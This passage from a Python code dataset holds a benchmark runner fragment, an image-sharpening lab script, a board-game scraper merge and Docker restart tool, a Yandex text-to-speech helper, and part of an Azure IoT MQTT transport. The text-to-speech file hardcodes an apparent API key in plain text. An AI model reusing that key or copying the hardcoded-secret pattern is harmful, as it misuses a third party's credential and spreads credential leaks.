range(loops)\n\n t0 = local_timer()\n for _ in range_it:\n local_func(*local_args)\n dt = local_timer() - t0\n else:\n t0 = local_timer()\n local_func(*local_args)\n dt = local_timer() - t0\n else:\n # fast-path when func has no argument: avoid the expensive\n # func(*args) argument unpacking\n\n if loops != 1:\n range_it = range(loops)\n\n t0 = local_timer()\n for _ in range_it:\n local_func()\n dt = local_timer() - t0\n else:\n t0 = local_timer()\n local_func()\n dt = local_timer() - t0\n\n return dt\n\n return self._main(sample_func)\n\n def _spawn_worker(self):\n args = []\n args.extend(self.program_args)\n args.extend(('--worker', '--stdout',\n '--samples', str(self.args.samples),\n '--warmups', str(self.args.warmups),\n '--loops', str(self.args.loops)))\n # FIXME: pass --min-time?\n if self.args.verbose:\n args.append('-' + 'v' * self.args.verbose)\n if self.args.affinity:\n args.append('--affinity=%s' % self.args.affinity)\n\n if self.prepare_subprocess_args:\n self.prepare_subprocess_args(self, args)\n\n return _bench_suite_from_subprocess(args)\n\n def _display_result(self, bench, check_unstable=True):\n stream = self._stream()\n args = self.args\n\n # Display the average +- stdev\n if self.args.quiet:\n check_unstable = False\n _display_benchmark(bench,\n file=stream,\n check_unstable=check_unstable,\n metadata=args.metadata,\n dump=args.dump,\n stats=args.stats,\n hist=args.hist)\n\n stream.flush()\n if args.json_append:\n if os.path.exists(args.json_append):\n suite = perf.BenchmarkSuite.load(args.json_append)\n else:\n suite = perf.BenchmarkSuite()\n suite._add_benchmark_runs(bench)\n suite.dump(args.json_append)\n\n if args.stdout:\n try:\n bench.dump(sys.stdout)\n except IOError as exc:\n if exc.errno != errno.EPIPE:\n raise\n # ignore broken pipe error\n\n # Close stdout to avoid the warning \"Exception ignored in: ...\"\n # at exit\n try:\n sys.stdout.close()\n except IOError:\n # close() is likely to fail with EPIPE (BrokenPipeError)\n pass\n\n if args.json:\n bench.dump(args.json)\n\n def _spawn_workers(self, bench, start_time):\n verbose = self.args.verbose\n quiet = self.args.quiet\n stream = self._stream()\n nprocess = self.args.processes\n\n for process in range(nprocess):\n run_suite = self._spawn_worker()\n\n run_benchmarks = run_suite.get_benchmarks()\n if len(run_benchmarks) != 1:\n raise ValueError(\"worker produced %s benchmarks instead of 1\"\n % len(run_benchmarks))\n run_bench = run_benchmarks[0]\n\n bench._add_benchmark_runs(run_bench)\n\n if verbose:\n run = bench.get_runs()[-1]\n run_index = '%s/%s' % (1 + process, nprocess)\n _display_run(bench, run_index, run, file=stream)\n elif not quiet:\n print(\".\", end='', file=stream)\n stream.flush()\n\n if not quiet:\n print(file=stream)\n\n duration = perf.monotonic_clock() - start_time\n mins, secs = divmod(duration, 60)\n if mins:\n duration = '%.0f min %.0f sec' % (mins, secs)\n else:\n duration = '%.1f sec' % secs\n bench.add_metadata('duration', duration)\n\n self._display_result(bench)\n return bench\n","sub_path":"perf/text_runner.py","file_name":"text_runner.py","file_ext":"py","file_size_in_byte":28057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"220684769","text":"from PIL import Image\nfrom numpy import *\nfrom GaussianFilters import * \nfrom NormalImage import normalizeImage\nfrom GrayScale import saveAsGrayScale\ndef unsharpMasking(im,sigma,gain):\n result = zeros(im.shape)\n if (im.ndim)==3:\n blur = colorGaussianFilter(im,sigma)\n else:\n blur = grayGaussianFilter(im,sigma)\n im = im.astype(int)\n blur = blur.astype(int)\n blurEdge = (im - blur)*gain\n result = im + blurEdge\n result = normalizeImage(result,255)\n result = result.astype(int)\n result = array(result,'uint8')\n return result\n\ndef main():\n path = '/Users/danielvillarreal/Dropbox/School/College/Fall 2016/Computer Vision/images/'\n name = 'city_blur'\n im = array(Image.open(path + name + '.jpg').convert('L'))\n saveAsGrayScale(name,path)\n sigma = 200\n gain = 0.9\n im2 = unsharpMasking(im,sigma,gain)\n im2 = Image.fromarray(im2)\n im2.convert('RGB').save(name + 'UnsharpMasking_StdDev=' + str(sigma) + '_Gain=' + str(gain) + '.png','png')\n\nmain()\n\n\n","sub_path":"Labs/Lab1/UnsharpMaskingFilter.py","file_name":"UnsharpMaskingFilter.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650782334","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Stop scraper, merge files, delete old files, and resume scraping.\"\"\"\n\nimport argparse\nimport logging\nimport subprocess\nimport sys\n\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom time import sleep\n\nfrom pytility import parse_bool, parse_float\nfrom yaml import safe_load\n\nfrom .merge import merge_files\nfrom .utils import now\n\nLOGGER = logging.getLogger(__name__)\nBASE_DIR = Path(__file__).resolve().parent.parent\nFEEDS_DIR = BASE_DIR / \"feeds\"\nDATA_DIR = (BASE_DIR / \"..\" / \"board-game-data\").resolve()\n\n\ndef merge_config(\n spider, item=\"GameItem\", in_paths=None, out_path=None, full=False, **kwargs\n):\n \"\"\"Returns arguments for merging a given spider.\"\"\"\n\n curr_date = now()\n curr_date_str = curr_date.strftime(\"%Y-%m-%dT%H-%M-%S\")\n\n kwargs[\"in_paths\"] = in_paths or FEEDS_DIR / spider / item / \"*\"\n kwargs.setdefault(\"keys\", f\"{spider}_id\")\n kwargs.setdefault(\"key_types\", \"int\" if spider in (\"bgg\", \"luding\") else \"str\")\n kwargs.setdefault(\"latest\", \"scraped_at\")\n kwargs.setdefault(\"latest_types\", \"date\")\n # kwargs.setdefault(\"latest_min\", curr_date - timedelta(days=360))\n kwargs.setdefault(\"concat_output\", True)\n\n if parse_bool(full):\n kwargs[\"out_path\"] = (\n out_path or FEEDS_DIR / spider / item / f\"{curr_date_str}-merged.jl\"\n )\n\n else:\n kwargs[\"out_path\"] = out_path or DATA_DIR / \"scraped\" / f\"{spider}_{item}.jl\"\n kwargs.setdefault(\n \"fieldnames_exclude\",\n (\"published_at\", \"updated_at\", \"scraped_at\"),\n )\n kwargs.setdefault(\"sort_keys\", True)\n\n return kwargs\n\n\ndef merge_configs(spider, full=False):\n \"\"\"Yields configs for all items in a given spider.\"\"\"\n\n full = parse_bool(full)\n\n if spider == \"bga\":\n yield merge_config(spider=\"bga\", item=\"GameItem\", full=full)\n yield merge_config(\n spider=\"bga\",\n item=\"RatingItem\",\n full=full,\n keys=(\"bga_user_id\", \"bga_id\"),\n fieldnames_exclude=(\"bgg_user_play_count\",)\n if parse_bool(full)\n else (\"bgg_user_play_count\", \"published_at\", \"updated_at\", \"scraped_at\"),\n )\n return\n\n if spider == \"bgg\":\n yield merge_config(spider=\"bgg\", item=\"GameItem\", full=full)\n yield merge_config(\n spider=\"bgg\",\n item=\"UserItem\",\n full=full,\n keys=\"bgg_user_name\",\n key_types=\"istr\",\n fieldnames_exclude=None if full else (\"published_at\", \"scraped_at\"),\n )\n yield merge_config(\n spider=\"bgg\",\n item=\"RatingItem\",\n full=full,\n keys=(\"bgg_user_name\", \"bgg_id\"),\n key_types=(\"istr\", \"int\"),\n fieldnames_exclude=None if full else (\"published_at\", \"scraped_at\"),\n )\n return\n\n if spider == \"bgg_hotness\":\n yield merge_config(\n spider=\"bgg_hotness\",\n item=\"GameItem\",\n full=full,\n keys=(\"published_at\", \"bgg_id\"),\n key_types=(\"date\", \"int\"),\n latest_min=None,\n fieldnames=None\n if full\n else (\n \"published_at\",\n \"rank\",\n \"add_rank\",\n \"bgg_id\",\n \"name\",\n \"year\",\n \"image_url\",\n ),\n fieldnames_exclude=None,\n sort_keys=False,\n sort_fields=(\"published_at\", \"rank\"),\n )\n return\n\n if spider == \"bgg_rankings\":\n yield merge_config(\n spider=\"bgg_rankings\",\n item=\"GameItem\",\n full=full,\n keys=(\"published_at\", \"bgg_id\"),\n key_types=(\"date\", \"int\"),\n latest_min=now() - timedelta(days=7),\n fieldnames=None\n if full\n else (\n \"published_at\",\n \"bgg_id\",\n \"rank\",\n \"add_rank\",\n \"name\",\n \"year\",\n \"num_votes\",\n \"bayes_rating\",\n \"avg_rating\",\n ),\n fieldnames_exclude=None,\n sort_keys=False,\n sort_fields=(\"published_at\", \"rank\"),\n )\n return\n\n # TODO news merge config\n\n yield merge_config(spider=spider, item=\"GameItem\", full=full)\n\n\ndef _parse_timeout(timeout):\n if timeout is None or timeout == \"\":\n return None\n\n timeout_float = parse_float(timeout)\n if timeout_float is not None:\n return timeout_float\n\n try:\n import pytimeparse\n except ImportError:\n return None\n\n return pytimeparse.parse(timeout)\n\n\ndef _docker_container(name):\n try:\n import docker\n except ImportError:\n LOGGER.warning(\"Docker library is not importable\")\n return None\n\n try:\n client = docker.from_env()\n return client.containers.get(name)\n except docker.errors.NotFound:\n LOGGER.warning(\"Did not find container <%s>\", name)\n\n return None\n\n\ndef _docker_start(name):\n LOGGER.info(\"Starting container <%s>\", name)\n\n container = _docker_container(name)\n\n if container is not None:\n try:\n container.start()\n LOGGER.info(\"Started via Docker library call\")\n return True\n except Exception:\n pass\n\n try:\n subprocess.run([\"docker\", \"compose\", \"start\", name], check=True)\n LOGGER.info(\"Started via docker compose CLI call\")\n return True\n except Exception:\n pass\n\n LOGGER.warning(\"Unable to start container <%s>\", name)\n return False\n\n\ndef _docker_stop(name, timeout=None):\n LOGGER.info(\"Stopping container <%s>\", name)\n if timeout is not None:\n LOGGER.info(\"Allowing a timeout of %.1f seconds\", timeout)\n\n container = _docker_container(name)\n\n if container is not None:\n try:\n if timeout is None:\n container.stop()\n else:\n container.stop(timeout=timeout)\n LOGGER.info(\"Stopped via Docker library call\")\n return True\n except Exception:\n pass\n\n try:\n args = (\n [\"docker\", \"compose\", \"stop\", name]\n if timeout is None\n else [\"docker\", \"compose\", \"stop\", \"--timeout\", str(timeout), name]\n )\n subprocess.run(args=args, check=True)\n LOGGER.info(\"Stopped via docker compose CLI call\")\n return True\n except Exception:\n pass\n\n LOGGER.warning(\"Unable to stop container <%s>\", name)\n return False\n\n\ndef _docker_compose(path, service):\n path = Path(path).resolve()\n LOGGER.info(\"Loading service <%s> from file <%s>\", service, path)\n try:\n with open(path) as compose_file:\n config = safe_load(compose_file)\n return config[\"services\"][service]\n except Exception:\n LOGGER.exception(\"Unable to load service <%s> from file <%s>\", service, path)\n return {}\n\n\ndef _stop_merge_start(spider, compose_file, full=True, timeout=None, cool_down=None):\n scraper_name = spider.translate({ord(\"-\"): \"_\"})\n docker_name = spider.translate({ord(\"_\"): \"-\"})\n LOGGER.info(\n \"Stopping, merging, and restarting spider <%s> / <%s>\",\n scraper_name,\n docker_name,\n )\n\n docker_config = _docker_compose(path=compose_file, service=docker_name)\n container = docker_config.get(\"container_name\")\n\n if not container:\n LOGGER.error(\"Unable to find container name for spider <%s>, aborting\", spider)\n return False\n\n timeout = _parse_timeout(timeout)\n if timeout is None:\n timeout = _parse_timeout(docker_config.get(\"stop_grace_period\"))\n\n # TODO add force option\n # if not _docker_stop(name=container, timeout=timeout):\n # LOGGER.error(\"Unable to stop <%s>, aborting\", container)\n # return False\n\n _docker_stop(name=container, timeout=timeout)\n\n if cool_down:\n LOGGER.info(\"Cooling down for %d seconds...\", cool_down)\n sleep(cool_down)\n\n for config in merge_configs(spider=scraper_name, full=full):\n LOGGER.info(\"Running merge with config %r\", config)\n merge_files(**config)\n\n if cool_down:\n LOGGER.info(\"Cooling down for %d seconds...\", cool_down)\n sleep(cool_down)\n\n return _docker_start(name=container)\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\"spiders\", nargs=\"+\", help=\"\")\n parser.add_argument(\n \"--compose-file\", \"-c\", default=BASE_DIR / \"docker-compose.yaml\"\n )\n parser.add_argument(\"--timeout\", \"-t\", help=\"\")\n parser.add_argument(\"--cool-down\", \"-d\", type=int, default=60, help=\"\")\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"count\",\n default=0,\n help=\"log level (repeat for more verbosity)\",\n )\n\n return parser.parse_args()\n\n\ndef main():\n \"\"\"Command line entry point.\"\"\"\n\n args = _parse_args()\n\n logging.basicConfig(\n stream=sys.stderr,\n level=logging.DEBUG if args.verbose > 0 else logging.INFO,\n format=\"%(asctime)s %(levelname)-8.8s [%(name)s:%(lineno)s] %(message)s\",\n )\n\n LOGGER.info(args)\n\n for spider in args.spiders:\n try:\n _stop_merge_start(\n spider=spider,\n compose_file=args.compose_file,\n timeout=args.timeout,\n cool_down=args.cool_down,\n )\n except Exception:\n LOGGER.exception(\"There was an error when processing spider <%s>\", spider)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"board_game_scraper/full_merge.py","file_name":"full_merge.py","file_ext":"py","file_size_in_byte":9644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"618139305","text":"from gtts import gTTS\nfrom googletrans import Translator\nfrom yandex_speech import TTS\nimport requests\nimport os\nimport os.path\nimport hashlib\n\n##Speech and translator declarations\nwords = '1'\nttsfilename=\"/tmp/\" + words + \".wav\"\ntranslator = Translator()\nlanguage='ru-RU'\nkey = \"3a5d503c-d9a8-489d-a100-954294c36cf8\"\n\n\n#Text to speech converter with translation\ndef say(words):\n# words= translator.translate(words, dest=language)\n# words=words.text\n# words=words.replace(\"Text, \",'',1)\n# words=words.strip()\n print(words)\n md5 = hashlib.sha1(words.encode('utf-8')).hexdigest()\n filemp3 = \"\"\n for file in os.listdir(\"/tmp/\"):\n if file.endswith(md5+\".wav\"):\n filemp3 = (os.path.join(file))\n\n if filemp3 == md5+\".wav\":\n print (\"Файл уже записан\")\n os.system(\"aplay -q /tmp/\"+ filemp3)\n print (\"И его проиграли\")\n else:\n print (\"Генерируем файл\")\n #tts = gTTS(text=words, lang=language)\n tts = TTS(\"alyss\", \"wav\", key, lang=language,emotion=\"good\")\n tts.generate(words)\n words = hashlib.sha1(words.encode('utf-8')).hexdigest()\n ttsfilename=\"/tmp/\" + words + \".wav\"\n tts.save(ttsfilename)\n os.system(\"aplay -q \"+ttsfilename)\n #os.remove(ttsfilename)\n\n","sub_path":"src/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263088145","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nimport logging\nfrom datetime import date\nimport six.moves.urllib as urllib\nimport six.moves.queue as queue\nfrom .mqtt_provider import MQTTProvider\nfrom transitions import Machine\nfrom azure.iot.hub.devicesdk.transport.abstract_transport import AbstractTransport\nfrom azure.iot.hub.devicesdk.transport import constant\nfrom azure.iot.hub.devicesdk.message import Message\n\n\n\"\"\"\nThe below import is for generating the state machine graph.\n\"\"\"\n# from transitions.extensions import LockedGraphMachine as Machine\n\nlogger = logging.getLogger(__name__)\n\n\"\"\"\nA note on names, design, and code flow:\n\nThis transport is a state machine which is responsible for coordinating\nseveral different things. (I would like to say that it coordinates several\nevents, but the word \"event\" is very overloaded, especially in this context,\nso I hesitate to add one more overload).\n\nIn particular, it needs to coordinate external things:\n 1. Things the caller wants to do, such as \"connect\", \"send message\", etc.\n 2. Calls into the transport provider\n 3. Completion callbacks from the transport provider.\n 4. Completion callbacks from this object into the caller.\n\nand also internal things:\n 5. The \"state\" of transport (connected, disconnected, etc).\n 6. Transitions between possible states.\n\nSince one caller-initiated action results in many different things happening, this\nclass uses the following conventions:\n\n1. Actions that the caller can initiate are all named without an underscore at the beginning,\n such as \"connect\", \"send_message\", etc.\n\n2. All internal functions are prefixed with an underscore. This is \"the pythonic way\", but it bears repeating.\n Internal functions are internal and should be called by external code.\n\n2. Actions will typically trigger a state machine event. State machine triggers, wihch may\n or may not change state, are all prefixed with _trig_ (_trig_connect, _trig_add_pending_action_to_queue, etc)\n The \"_trig\" indicates that this is a operation on the state machine. _trig_* functions are also unusual in\n that they get added to the transport object at runtime when intiializing the Machine object.\n\n3. Functions which call into the provider are prefixed with \"_call_provider_\", such as _call_provider_connect.\n These are always called as part of state machine transitions. Calls from the caller should not go directly into the\n provider without going through the state machine.\n\n4. When the provider completes an action or receives an acknowledgement, it will call back into this object using\n functions which are all prefixed with \"_on_provider_\", such as \"_on_provider_connect_complete\". These callback functions\n will, most of the time, trigger additional state machine transitions by calling _trig_ functions.\n\n5. Functions which are called by the state machine as side-effects of state transitions will accept event_data objects\n as the second parameter (after self). The event_data structure contains information about the trigger or the transition\n which caused the side-effect.\n\n6. Callbacks from this object into caller code, when not passed in as `callback` parameters to function calls, are prefixed with\n on_ (with no underscore), such as \"on_transport_connected'. Because most callbacks are passed in as function parameters,\n there are very few callbacks like this.\n\n\"\"\"\n\n\nTOPIC_POS_DEVICE = 4\nTOPIC_POS_MODULE = 6\nTOPIC_POS_INPUT_NAME = 5\n\n\nclass TransportAction(object):\n \"\"\"\n base class representing various actions that can be taken\n when the transport is connected. When the MqttTransport user\n calls a function that requires the transport to be connected,\n a TransportAction object is created and added to the action\n queue. Then, when the transport is actually connected, it\n loops through the objects in the action queue and executes them\n one by one.\n \"\"\"\n\n def __init__(self, callback):\n self.callback = callback\n\n\nclass SendMessageAction(TransportAction):\n \"\"\"\n TransportAction object used to send a telemetry message or an\n output message\n \"\"\"\n\n def __init__(self, message, callback):\n TransportAction.__init__(self, callback)\n self.message = message\n\n\nclass SubscribeAction(TransportAction):\n \"\"\"\n TransportAction object used to subscribe to a specific MQTT topic\n \"\"\"\n\n def __init__(self, topic, qos, callback):\n TransportAction.__init__(self, callback)\n self.topic = topic\n self.qos = qos\n\n\nclass UnsubscribeAction(TransportAction):\n \"\"\"\n TransportAction object used to unsubscribe from a specific MQTT topic\n \"\"\"\n\n def __init__(self, topic, callback):\n TransportAction.__init__(self, callback)\n self.topic = topic\n\n\nclass MethodReponseAction(TransportAction):\n \"\"\"\n TransportAction object used to send a method response back to the service.\n \"\"\"\n\n def __init__(self, method_response, callback):\n TransportAction.__init__(self, callback)\n self.method_response = method_response\n\n\nclass MQTTTransport(AbstractTransport):\n def __init__(self, auth_provider):\n \"\"\"\n Constructor for instantiating a transport\n :param auth_provider: The authentication provider\n \"\"\"\n AbstractTransport.__init__(self, auth_provider)\n self.topic = self._get_telemetry_topic_for_publish()\n self._mqtt_provider = None\n self.on_transport_connected = None\n self.on_transport_disconnected = None\n\n # Queue of actions that will be executed once the transport is connected.\n # Currently, we use a queue, which is FIFO, but the actual order doesn't matter\n # since each action stands on its own.\n self._pending_action_queue = queue.Queue()\n\n # Object which maps mid->callback for actions which are in flight. This is\n # used to call back into the caller to indicate that an action is complete.\n self._in_progress_actions = {}\n\n self._connect_callback = None\n self._disconnect_callback = None\n\n self._c2d_topic = None\n self._input_topic = None\n\n states = [\"disconnected\", \"connecting\", \"connected\", \"disconnecting\"]\n\n transitions = [\n {\n \"trigger\": \"_trig_connect\",\n \"source\": \"disconnected\",\n \"dest\": \"connecting\",\n \"after\": \"_call_provider_connect\",\n },\n {\"trigger\": \"_trig_connect\", \"source\": [\"connecting\", \"connected\"], \"dest\": None},\n {\n \"trigger\": \"_trig_provider_connect_complete\",\n \"source\": \"connecting\",\n \"dest\": \"connected\",\n \"after\": \"_execute_actions_in_queue\",\n },\n {\n \"trigger\": \"_trig_disconnect\",\n \"source\": [\"disconnected\", \"disconnecting\"],\n \"dest\": None,\n },\n {\n \"trigger\": \"_trig_disconnect\",\n \"source\": \"connected\",\n \"dest\": \"disconnecting\",\n \"after\": \"_call_provider_disconnect\",\n },\n {\n \"trigger\": \"_trig_provider_disconnect_complete\",\n \"source\": \"disconnecting\",\n \"dest\": \"disconnected\",\n },\n {\n \"trigger\": \"_trig_add_action_to_pending_queue\",\n \"source\": \"connected\",\n \"before\": \"_add_action_to_queue\",\n \"dest\": None,\n \"after\": \"_execute_actions_in_queue\",\n },\n {\n \"trigger\": \"_trig_add_action_to_pending_queue\",\n \"source\": \"connecting\",\n \"before\": \"_add_action_to_queue\",\n \"dest\": None,\n },\n {\n \"trigger\": \"_trig_add_action_to_pending_queue\",\n \"source\": \"disconnected\",\n \"before\": \"_add_action_to_queue\",\n \"dest\": \"connecting\",\n \"after\": \"_call_provider_connect\",\n },\n {\n \"trigger\": \"_trig_on_shared_access_string_updated\",\n \"source\": \"connected\",\n \"dest\": \"connecting\",\n \"after\": \"_call_provider_reconnect\",\n },\n {\n \"trigger\": \"_trig_on_shared_access_string_updated\",\n \"source\": [\"disconnected\", \"disconnecting\"],\n \"dest\": None,\n },\n ]\n\n def _on_transition_complete(event_data):\n if not event_data.transition:\n dest = \"[no transition]\"\n else:\n dest = event_data.transition.dest\n logger.info(\n \"Transition complete. Trigger=%s, Dest=%s, result=%s, error=%s\",\n event_data.event.name,\n dest,\n str(event_data.result),\n str(event_data.error),\n )\n\n self._state_machine = Machine(\n model=self,\n states=states,\n transitions=transitions,\n initial=\"disconnected\",\n send_event=True, # This has nothing to do with telemetry events. This tells the machine use event_data structures to hold transition arguments\n finalize_event=_on_transition_complete,\n queued=True,\n )\n\n # to render the state machine as a PNG:\n # 1. apt install graphviz\n # 2. pip install pygraphviz\n # 3. change import line at top of this file to import LockedGraphMachine as Machine\n # 4. uncomment the following line\n # 5. run this code\n # self.get_graph().draw('mqtt_transport.png', prog='dot')\n\n self._create_mqtt_provider()\n\n def _call_provider_connect(self, event_data):\n \"\"\"\n Call into the provider to connect the transport.\n\n This is called by the state machine as part of a state transition\n\n :param EventData event_data: Object created by the Transitions library with information about the state transition\n \"\"\"\n logger.info(\"Calling provider connect\")\n password = self._auth_provider.get_current_sas_token()\n self._mqtt_provider.connect(password)\n\n if hasattr(self._auth_provider, \"token_update_callback\"):\n self._auth_provider.token_update_callback = self._on_shared_access_string_updated\n\n def _call_provider_disconnect(self, event_data):\n \"\"\"\n Call into the provider to disconnect the transport.\n\n This is called by the state machine as part of a state transition\n\n :param EventData event_data: Object created by the Transitions library with information about the state transition\n \"\"\"\n logger.info(\"Calling provider disconnect\")\n self._mqtt_provider.disconnect()\n self._auth_provider.disconnect()\n\n def _call_provider_reconnect(self, event_data):\n \"\"\"\n Call into the provider to reconnect the transport.\n\n This is called by the state machine as part of a state transition\n\n :param EventData event_data: Object created by the Transitions library with information about the state transition\n \"\"\"\n password = self._auth_provider.get_current_sas_token()\n self._mqtt_provider.reconnect(password)\n\n def _on_provider_connect_complete(self):\n \"\"\"\n Callback that is called by the provider when the connection has been established\n \"\"\"\n logger.info(\"_on_provider_connect_complete\")\n self._trig_provider_connect_complete()\n\n if self.on_transport_connected:\n self.on_transport_connected(\"connected\")\n callback = self._connect_callback\n if callback:\n self._connect_callback = None\n callback()\n\n def _on_provider_disconnect_complete(self):\n \"\"\"\n Callback that is called by the provider when the connection has been disconnected\n \"\"\"\n logger.info(\"_on_provider_disconnect_complete\")\n self._trig_provider_disconnect_complete()\n\n if self.on_transport_disconnected:\n self.on_transport_disconnected(\"disconnected\")\n callback = self._disconnect_callback\n if callback:\n self._disconnect_callback = None\n callback()\n\n def _on_provider_publish_complete(self, mid):\n \"\"\"\n Callback that is called by the provider when it receives a PUBACK from the service\n\n :param mid: message id that was returned by the provider when `publish` was called. This is used to tie the\n PUBLISH to the PUBACK.\n \"\"\"\n if mid in self._in_progress_actions:\n callback = self._in_progress_actions[mid]\n del self._in_progress_actions[mid]\n callback()\n else:\n # TODO: tests for unkonwn MID cases\n logger.warning(\"PUBACK received with unknown MID: %s\", str(mid))\n\n def _on_provider_subscribe_complete(self, mid):\n \"\"\"\n Callback that is called by the provider when it receives a SUBACK from the service\n\n :param mid: message id that was returned by the provider when `subscribe` was called. This is used to tie the\n SUBSCRIBE to the SUBACK.\n \"\"\"\n if mid in self._in_progress_actions:\n callback = self._in_progress_actions[mid]\n del self._in_progress_actions[mid]\n callback()\n else:\n # TODO: tests for unkonwn MID cases\n logger.warning(\"SUBACK received with unknown MID: %s\", str(mid))\n\n def _on_provider_message_received_callback(self, topic, payload):\n \"\"\"\n Callback that is called by the provider when a message is received. This message can be any MQTT message,\n including, but not limited to, a C2D message, an input message, a TWIN patch, a twin response (/res), and\n a method invocation. This function needs to decide what kind of message it is based on the topic name and\n take the correct action.\n\n :param topic: MQTT topic name that the message arrived on\n :param payload: Payload of the message\n \"\"\"\n logger.info(\"Message received on topic %s\", topic)\n message_received = Message(payload)\n # TODO : Discuss everything in bytes , need to be changed, specially the topic\n topic_str = topic.decode(\"utf-8\")\n topic_parts = topic_str.split(\"/\")\n\n if _is_input_topic(topic_str):\n input_name = topic_parts[TOPIC_POS_INPUT_NAME]\n message_received.input_name = input_name\n _extract_properties(topic_parts[TOPIC_POS_MODULE], message_received)\n self.on_transport_input_message_received(input_name, message_received)\n elif _is_c2d_topic(topic_str):\n _extract_properties(topic_parts[TOPIC_POS_DEVICE], message_received)\n self.on_transport_c2d_message_received(message_received)\n else:\n pass # is there any other case\n\n def _on_provider_unsubscribe_complete(self, mid):\n \"\"\"\n Callback that is called by the provider when it receives an UNSUBACK from the service\n\n :param mid: message id that was returned by the provider when `unsubscribe` was called. This is used to tie the\n UNSUBSCRIBE to the UNSUBACK.\n \"\"\"\n if mid in self._in_progress_actions:\n callback = self._in_progress_actions[mid]\n del self._in_progress_actions[mid]\n callback()\n else:\n # TODO: tests for unkonwn MID cases\n logger.warning(\"UNSUBACK received with unknown MID: %s\", str(mid))\n\n def _add_action_to_queue(self, event_data):\n \"\"\"\n Queue an action for running later. All actions that need to run while connected end up in\n this queue, even if they're going to be run immediately.\n\n This is called by the state machine as part of a state transition\n\n :param EventData event_data: Object created by the Transitions library with information about the state transition\n \"\"\"\n action = event_data.args[0]\n if isinstance(action, TransportAction):\n self._pending_action_queue.put_nowait(event_data.args[0])\n else:\n assert False\n\n def _execute_action(self, action):\n \"\"\"\n Execute an action from the action queue. This is called when the transport is connected and the\n state machine is able to execute individual actions.\n\n :param TransportAction action: object containing the details of the action to be executed\n \"\"\"\n\n if isinstance(action, SendMessageAction):\n logger.info(\"running SendMessageAction\")\n message_to_send = action.message\n encoded_topic = _encode_properties(\n message_to_send, self._get_telemetry_topic_for_publish()\n )\n mid = self._mqtt_provider.publish(encoded_topic, message_to_send.data)\n self._in_progress_actions[mid] = action.callback\n\n elif isinstance(action, SubscribeAction):\n logger.info(\"running SubscribeAction topic=%s qos=%s\", action.topic, action.qos)\n mid = self._mqtt_provider.subscribe(action.topic, action.qos)\n logger.info(\"subscribe mid = %s\", mid)\n self._in_progress_actions[mid] = action.callback\n\n elif isinstance(action, UnsubscribeAction):\n logger.info(\"running UnsubscribeAction\")\n mid = self._mqtt_provider.unsubscribe(action.topic)\n self._in_progress_actions[mid] = action.callback\n\n elif isinstance(action, MethodReponseAction):\n logger.info(\"running MethodResponseAction\")\n topic = \"TODO\"\n mid = self._mqtt_provider.publish(topic, action.method_response)\n self._in_progress_actions[mid] = action.callback\n\n else:\n logger.error(\"Removed unknown action type from queue.\")\n\n def _execute_actions_in_queue(self, event_data):\n \"\"\"\n Execute any actions that are waiting in the action queue.\n This is called by the state machine as part of a state transition.\n This function actually calls down into the provider to perform the necessary operations.\n\n :param EventData event_data: Object created by the Transitions library with information about the state transition\n \"\"\"\n logger.info(\"checking _pending_action_queue\")\n while True:\n try:\n action = self._pending_action_queue.get_nowait()\n except queue.Empty:\n logger.info(\"done checking queue\")\n return\n\n self._execute_action(action)\n\n def _create_mqtt_provider(self):\n \"\"\"\n Create the provider object which is used by this instance to communicate with the service.\n No network communication can take place without a provider object.\n \"\"\"\n client_id = self._auth_provider.device_id\n\n if self._auth_provider.module_id:\n client_id += \"/\" + self._auth_provider.module_id\n\n username = self._auth_provider.hostname + \"/\" + client_id + \"/\" + \"?api-version=2018-06-30\"\n\n hostname = None\n if hasattr(self._auth_provider, \"gateway_hostname\"):\n hostname = self._auth_provider.gateway_hostname\n if not hostname or len(hostname) == 0:\n hostname = self._auth_provider.hostname\n\n if hasattr(self._auth_provider, \"ca_cert\"):\n ca_cert = self._auth_provider.ca_cert\n else:\n ca_cert = None\n\n self._mqtt_provider = MQTTProvider(client_id, hostname, username, ca_cert=ca_cert)\n\n self._mqtt_provider.on_mqtt_connected = self._on_provider_connect_complete\n self._mqtt_provider.on_mqtt_disconnected = self._on_provider_disconnect_complete\n self._mqtt_provider.on_mqtt_published = self._on_provider_publish_complete\n self._mqtt_provider.on_mqtt_subscribed = self._on_provider_subscribe_complete\n self._mqtt_provider.on_mqtt_unsubscribed = self._on_provider_unsubscribe_complete\n self._mqtt_provider.on_mqtt_message_received = self._on_provider_message_received_callback\n\n def _get_topic_base(self):\n \"\"\"\n return the string that is at the beginning of all topics for this\n device/module\n \"\"\"\n\n if self._auth_provider.module_id:\n return (\n \"devices/\"\n + self._auth_provider.device_id\n + \"/modules/\"\n + self._auth_provider.module_id\n )\n else:\n return \"devices/\" + self._auth_provider.device_id\n\n def _get_telemetry_topic_for_publish(self):\n \"\"\"\n return the topic string used to publish telemetry\n \"\"\"\n return self._get_topic_base() + \"/messages/events/\"\n\n def _get_c2d_topic_for_subscribe(self):\n \"\"\"\n :return: The topic for cloud to device messages.It is of the format\n \"devices//messages/devicebound/#\"\n \"\"\"\n return self._get_topic_base() + \"/messages/devicebound/#\"\n\n def _get_input_topic_for_subscribe(self):\n \"\"\"\n :return: The topic for input messages. It is of the format\n \"devices//modules//messages/inputs/#\"\n \"\"\"\n return self._get_topic_base() + \"/inputs/#\"\n\n def connect(self, callback=None):\n \"\"\"\n Connect to the service.\n\n :param callback: callback which is called when the connection to the service is complete.\n \"\"\"\n logger.info(\"connect called\")\n self._connect_callback = callback\n self._trig_connect()\n\n def disconnect(self, callback=None):\n \"\"\"\n Disconnect from the service.\n\n :param callback: callback which is called when the connection to the service has been disconnected\n \"\"\"\n 